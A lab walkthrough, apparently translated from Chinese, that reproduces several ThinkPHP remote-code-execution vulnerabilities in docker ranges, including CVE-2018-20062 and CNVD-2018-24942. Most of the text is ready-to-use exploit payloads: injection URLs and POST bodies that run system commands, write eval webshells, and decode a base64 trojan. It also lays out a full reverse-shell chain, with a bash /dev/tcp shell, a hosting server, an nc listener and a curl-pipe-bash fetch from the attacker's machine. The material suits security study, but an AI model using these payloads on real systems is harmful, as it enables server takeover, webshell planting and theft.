Article directory
Introduction to ThinkPHP
Thinkphp is an open source framework. It is a lightweight PHP development framework developed by Chinese to support server environments such as windows/Unix/Linux.
Many cms are developed based on thinkphp, so if there is a problem with thinkphp, it will affect many websites developed based on thinkphp.
Thinkphp History Vulnerability
Version | Vulnerability type |
---|---|
ThinkPHP3.2.3 | Cache function design flaw can lead to Getshell |
ThinkPHP3.2.3 | The latest version update injection vulnerability |
ThinkPHP3.2.X | find_select_delete injection |
ThinkPHP3.X | order_by injection vulnerability |
ThinkPHP5.0.X | sql injection vulnerability |
ThinkPHP5.0.10 | Cache function design flaw can lead to Getshell |
ThinkPHP5 | SQL Injection Vulnerability && Sensitive Information Leakage |
ThinkPHP5.X | order_by injection vulnerability |
ThinkPHP5.X | remote code execution |
Thinkphp 2.x Arbitrary Code Execution Vulnerability
Vulnerability description
The reason for the vulnerability is that in the ThinkPHP 2.x version, the /e (executable mode) pattern matching route of preg_replace ('regular rule', 'replacement character', 'target character') is used:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
Cause the user's input parameters to be inserted into double quotes for execution, resulting in arbitrary code execution vulnerabilities.
Affected version
ThinkPHP 2.x
ThinkPHP 3.0
Vulnerability recurrence
docker-compose up -d
docker ps
Visit the range address http://yourip:8080
Validate Vulnerabilities Using PoC
http://192.168.88.130:8080/index.php?s=/index/index/xxx/${@phpinfo()}
phpinfo is executed successfully, then try webshell
http://192.168.88.130:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}
Ant Sword Connection
Thinkphp5.0.23 Remote Code Execution Vulnerability (CVE-2018-20062)
Vulnerability description
Vulnerability in ThinkPHP5.0.23 version: The method to obtain the method does not correctly handle the method name, allowing the attacker to call any method of the Request class and construct an exploit chain, resulting in a remote code execution vulnerability.
Affected version
Thinkphp 5.0.0~ 5.0.23
Vulnerability recurrence
docker-compose up -d
docker ps
Visit Range Address
To determine whether there is a loophole, visit the /index.php?s=captcha page, and an error will appear
Use the post request to execute the whoami command, id, pwd and other system commands, which will be echoed to the page
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
Use the echo command to write to the webshell, you need to base64 encode the one-sentence Trojan horse
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n
YWE8P3BocCBAZXZhbCgkX1BPU1RbJ2NtZCddKTs/PmM= | base64 -d > shell.php
Send a post request and access the shell.php file
Enter the server to check whether the upload is successful
bash reverse shell operation
Create a new xx.sh file on the attacking machine, and write the bash reverse shell command.
bash -i >& /dev/tcp/192.168.88.128/6666 0>&1
#IP为攻击机的ip,端口自定义
The http service guarantee is enabled on the attacking machine, and the target machine can access the xx.sh rebound shell file
python3 -m http.server 80
Attacker opens listening port 6666
nc -lvvp 6666
Using a post request, send the following poc
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=curl 192.168.88.128/thinkphp5.0.23.sh | bash
Check the listening port and find a successful rebound
RCE vulnerability analysis caused by ThinkPHP 5.0.x not enabling mandatory routing (CNVD-2018-24942)
Vulnerability description
The framework does not strictly filter incoming routing parameters, allowing attackers to operate unintended controller classes to execute code remotely.
Affected version
ThinkPHP 5.0.5-5.0.22
5.1.0-5.1.30
Vulnerability recurrence
docker-compose up -d
docker ps
Visit the shooting range and build successfully
Write PoC
index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1
Remote Command Execution, PoC
/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&v
ars[1][]=whoami
write to webshell
/index.php?
s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[ccc]);?>
/index.php?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n
bash反弹shell命令得base64编码 | base64 -d > shell9.php